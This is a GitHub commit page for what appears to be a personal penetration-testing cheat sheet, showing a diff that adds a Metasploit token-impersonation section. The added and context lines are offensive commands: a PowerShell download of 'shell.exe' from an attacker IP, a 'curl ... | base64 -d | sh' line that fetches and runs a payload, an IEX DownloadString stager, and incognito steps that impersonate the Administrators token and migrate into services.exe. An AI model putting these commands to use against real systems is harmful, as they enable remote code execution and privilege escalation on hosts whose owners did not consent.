Skip to content

Commit

Permalink
metasploit token impersonate
Browse files Browse the repository at this point in the history
  • Loading branch information
leetcore committed Jul 11, 2023
1 parent 56ccc82 commit 47302af
Showing 1 changed file with 9 additions and 0 deletions.
9 changes: 9 additions & 0 deletions 1337_file.txt
Original file line number Diff line number Diff line change
Expand Up @@ -108,6 +108,7 @@ sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim

In Powershell:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.18.11.136:8000/shell.exe','shell.exe')"
IEX(New-Object Net.WebClient).DownloadString('http://...')

# POWERSHELL (powershell, ps)
Expand Down Expand Up @@ -455,6 +456,14 @@ set LHOST tun0
set LPORT 1337
run -j

# METASPLOIT (metasploit, windows, token)
load incognito
list_tokens -g
impersonate_token "BUILTIN\Administrators"
getuid
ps (find services.exe PID)
migrate 668 (services.exe PID)

Database:
sudo msfdb run
hosts -d (delete hosts)
Expand Down

0 comments on commit 47302af

Please sign in to comment.